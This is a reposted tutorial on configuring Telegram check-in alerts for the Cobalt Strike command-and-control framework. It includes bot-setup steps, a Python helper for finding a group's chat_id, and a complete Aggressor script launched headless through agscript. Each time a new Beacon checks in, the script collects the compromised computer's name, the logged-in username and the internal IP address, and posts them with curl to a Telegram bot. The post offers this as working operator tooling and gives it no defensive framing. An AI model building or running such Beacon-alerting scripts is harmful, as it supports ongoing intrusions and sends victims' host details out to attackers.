
Configuring Telegram check-in notifications for Cobalt Strike

Author: Internet

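1. Create a bot on Telegram

Reference link:
https://zhuanlan.zhihu.com/p/30450761

Reply with "/newbot" to start creating your bot. BotFather will ask you to enter the bot's name and the bot's username. The bot name is shown in the search interface, while the bot's username is what matters when searching for the bot and when adding it to a group (you cannot add a bot to a group by searching for its name). The username must end in bot or _bot (case-insensitive), for example ABCBot or ABC_bot.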

2. Add the bot to a Telegram group

3. Visit the following URL

https://api.telegram.org/bot<the bot token you were issued>/getUpdates
The response then gives you the chat_id of the group the bot was added to.
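
For step 3, an added example (not part of the original post) that pulls the group chat_id out of a saved getUpdates response. The sample JSON, the chat title and the IDs are constructed, and the function name extract_chats is hypothetical.

```python
import json

# Constructed sample of a getUpdates response (not real data): the bot was
# added to a group, someone wrote in that group, and one user also messaged
# the bot privately.
SAMPLE_RESPONSE = json.dumps({
    "ok": True,
    "result": [
        {"update_id": 1001, "my_chat_member": {
            "chat": {"id": -1001234567890, "title": "ops-alerts", "type": "supergroup"}}},
        {"update_id": 1002, "message": {
            "chat": {"id": -1001234567890, "title": "ops-alerts", "type": "supergroup"},
            "text": "hi"}},
        {"update_id": 1003, "message": {
            "chat": {"id": 55501234, "first_name": "Sample", "type": "private"},
            "text": "/start"}},
    ],
})

# Update fields that carry a "chat" object.
CHAT_BEARING_KEYS = ("message", "edited_message", "channel_post",
                     "my_chat_member", "chat_member")


def extract_chats(raw, group_only=True):
    """Return {chat_id: label} for every chat seen in a getUpdates response."""
    data = json.loads(raw)
    if not data.get("ok"):
        # Failures (for example a wrong token) come back as ok=false plus a description.
        raise ValueError("API error: %s" % data.get("description", "unknown"))
    chats = {}
    for update in data.get("result", []):
        for key in CHAT_BEARING_KEYS:
            chat = (update.get(key) or {}).get("chat")
            if not chat:
                continue
            if group_only and chat.get("type") not in ("group", "supergroup"):
                continue
            # Several updates from the same chat collapse into one entry.
            chats[chat["id"]] = chat.get("title") or chat.get("first_name", "")
    return chats


if __name__ == "__main__":
    for chat_id, label in extract_chats(SAMPLE_RESPONSE).items():
        print(chat_id, label)
```

Group and supergroup IDs are negative numbers, so the leading minus sign must be kept when the value is copied into $chat_id.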

4. Run the following script in Cobalt Strike

tg.cna

# author: dayu

# ------------ set these config: ------------
$bot_token = "xxxxxxx";
$chat_id = 'xxxxxxx'; # Write your group_id or user_id
$teamserver_hostname = 'HOSTNAME-1'; # You will receive messages containing it
# -------------------------------------------

$tg_bot_webhookURL = 'https://api.telegram.org/bot' . $bot_token . '/sendMessage';

# Sent once when the script is loaded, to confirm the token and chat_id work
$test_message = 'this is a test message, test success';
@curl_command = @('curl', '-X', 'POST', '--data-urlencode', 'chat_id=' . $chat_id, '--data-urlencode', 'text=' . $test_message, $tg_bot_webhookURL);
exec(@curl_command);

# Fires on the first check-in of each new Beacon; $1 is the Beacon ID
on beacon_initial {
    println("Initial Beacon Checkin: " . $1 . " PID: " . beacon_info($1, "pid"));
    local('$internalIP $computerName $userName $message');
    $internalIP = replace(beacon_info($1, "internal"), " ", "_");
    $computerName = replace(beacon_info($1, "computer"), " ", "_");
    $userName = replace(beacon_info($1, "user"), " ", "_");
    $message = 'Message from ' . $teamserver_hostname . ' Server%0aBeacon success implant Info Target:%0aComputer name : ' . $computerName . '%0aUsername : ' . $userName . '%0aIP address : ' . $internalIP;
    # text goes through --data (not --data-urlencode) so the literal %0a sequences arrive as line breaks;
    # the Beacon metadata is therefore sent unescaped, and any &, % or + in it will alter the request
    @curl_command = @('curl', '-X', 'POST', '--data-urlencode', 'chat_id=' . $chat_id, '--data', 'text=' . $message, $tg_bot_webhookURL);
    exec(@curl_command);
}

After filling in chat_id and bot_token, run the following command

nohup ./agscript <CS IP> <CS port> user password tg.cna &

Source: https://www.cnblogs.com/sakura521/p/14907428.html